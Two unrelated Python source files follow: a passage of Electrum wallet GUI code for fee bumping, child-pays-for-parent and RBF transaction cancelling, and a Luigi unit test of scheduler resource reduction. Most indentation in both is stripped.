out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
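            # Solve (parent_fee + child_fee) / total_size = fee_per_kb / 1000 for the child fee,
            # then clamp it between 1 sat/byte of the combined size and the spendable output value.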
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
            self.show_error(f'''{_("Can't CPFP")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
            return  # fee left empty, treat it as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
try:
new_tx = self.wallet.cpfp(parent_tx, fee)
except CannotCPFP as e:
self.show_error(str(e))
return
self.show_transaction(new_tx)
def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool:
"""Returns whether successful."""
# note side-effect: tx is being mutated
assert isinstance(tx, PartialTransaction)
try:
# note: this might download input utxos over network
BlockingWaitingDialog(
self,
_("Adding info to tx, from wallet and network..."),
lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False),
)
except NetworkException as e:
self.show_error(repr(e))
return False
return True
def _rbf_dialog(self, tx: Transaction, func, title, help_text):
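        """Shared dialog behind fee-bumping and transaction cancelling.

        func(new_fee_rate) must return the replacement transaction; it is called on every
        feerate edit to validate the input and once more with the final value on accept.
        """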
txid = tx.txid()
assert txid
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
fee = tx.get_fee()
assert fee is not None
tx_label = self.wallet.get_label_for_txid(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, title)
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(help_text))
ok_button = OkButton(d)
warning_label = WWLabel('\n')
warning_label.setStyleSheet(ColorScheme.RED.as_stylesheet())
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
def on_feerate():
fee_rate = feerate_e.get_amount()
warning_text = '\n'
if fee_rate is not None:
try:
new_tx = func(fee_rate)
except Exception as e:
new_tx = None
warning_text = str(e).replace('\n',' ')
else:
new_tx = None
ok_button.setEnabled(new_tx is not None)
warning_label.setText(warning_text)
feerate_e.textChanged.connect(on_feerate)
def on_slider(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider)
fee_combo = FeeComboBox(fee_slider)
fee_slider.deactivate()
feerate_e.textEdited.connect(fee_slider.deactivate)
grid = QGridLayout()
grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
grid.addWidget(feerate_e, 2, 1)
grid.addWidget(fee_slider, 3, 1)
grid.addWidget(fee_combo, 3, 2)
vbox.addLayout(grid)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addWidget(warning_label)
vbox.addLayout(Buttons(CancelButton(d), ok_button))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = func(new_fee_rate)
except Exception as e:
self.show_error(str(e))
return
new_tx.set_rbf(not is_final)
self.show_transaction(new_tx, tx_desc=tx_label)
def bump_fee_dialog(self, tx: Transaction):
title = _('Bump Fee')
help_text = _("Increase your transaction's fee to improve its position in mempool.")
def func(new_fee_rate):
return self.wallet.bump_fee(
tx=tx,
txid=tx.txid(),
new_fee_rate=new_fee_rate,
coins=self.get_coins())
self._rbf_dialog(tx, func, title, help_text)
def dscancel_dialog(self, tx: Transaction):
title = _('Cancel transaction')
help_text = _(
"Cancel an unconfirmed RBF transaction by double-spending "
"its inputs back to your wallet with a higher fee.")
def func(new_fee_rate):
return self.wallet.dscancel(tx=tx, new_fee_rate=new_fee_rate)
self._rbf_dialog(tx, func, title, help_text)
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
|
task_running_resources_test.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import time
import signal
import multiprocessing
from contextlib import contextmanager
from helpers import unittest, RunOnceTask
import luigi
import luigi.server
class ResourceTestTask(RunOnceTask):
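    """Task claiming two units of the "foo" resource; optionally lowers its claim to one unit while running."""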
param = luigi.Parameter()
reduce_foo = luigi.BoolParameter()
def process_resources(self):
return {"foo": 2}
def run(self):
if self.reduce_foo:
self.decrease_running_resources({"foo": 1})
time.sleep(2)
super(ResourceTestTask, self).run()
class ResourceWrapperTask(RunOnceTask):
reduce_foo = ResourceTestTask.reduce_foo
def requires(self):
return [
ResourceTestTask(param="a", reduce_foo=self.reduce_foo),
ResourceTestTask(param="b"),
]
class LocalRunningResourcesTest(unittest.TestCase):
def test_resource_reduction(self):
# trivial resource reduction on local scheduler
# test the running_task_resources setter and getter
sch = luigi.scheduler.Scheduler(resources={"foo": 2})
with luigi.worker.Worker(scheduler=sch) as w:
task = ResourceTestTask(param="a", reduce_foo=True)
w.add(task)
w.run()
self.assertEqual(sch.get_running_task_resources(task.task_id)["resources"]["foo"], 1)
class ConcurrentRunningResourcesTest(unittest.TestCase):
def setUp(self):
super(ConcurrentRunningResourcesTest, self).setUp()
# run the luigi server in a new process and wait for its startup
self._process = multiprocessing.Process(target=luigi.server.run)
self._process.start()
time.sleep(0.5)
# configure the rpc scheduler, update the foo resource
self.sch = luigi.rpc.RemoteScheduler()
self.sch.update_resource("foo", 3)
def tearDown(self):
super(ConcurrentRunningResourcesTest, self).tearDown()
# graceful server shutdown
self._process.terminate()
self._process.join(timeout=1)
if self._process.is_alive():
os.kill(self._process.pid, signal.SIGKILL)
@contextmanager
def worker(self, scheduler=None, processes=2):
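        """Yield a multi-process worker bound to the remote scheduler, with fast polling and no unfulfilled-dependency checks to keep the test short."""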
with luigi.worker.Worker(scheduler=scheduler or self.sch, worker_processes=processes) as w:
w._config.wait_interval = 0.2
w._config.check_unfulfilled_deps = False
yield w
@contextmanager
def assert_duration(self, min_duration=0, max_duration=-1):
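        """Assert that the wrapped block takes more than min_duration and, if given, less than max_duration seconds."""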
t0 = time.time()
try:
yield
finally:
duration = time.time() - t0
self.assertGreater(duration, min_duration)
if max_duration > 0:
self.assertLess(duration, max_duration)
def test_tasks_serial(self):
# serial test
# run two tasks that do not reduce the "foo" resource
# as the total foo resource (3) is smaller than the requirement of two tasks (4),
# the scheduler is forced to run them serially which takes longer than 4 seconds
with self.worker() as w:
w.add(ResourceWrapperTask(reduce_foo=False))
with self.assert_duration(min_duration=4):
w.run()
def test_tasks_parallel(self):
# parallel test
# run two tasks and the first one lowers its requirement on the "foo" resource, so that
# the total "foo" resource (3) is sufficient to run both tasks in parallel shortly after
# the first task started, so the entire process should not exceed 4 seconds
with self.worker() as w:
w.add(ResourceWrapperTask(reduce_foo=True))
with self.assert_duration(max_duration=4):
w.run()
|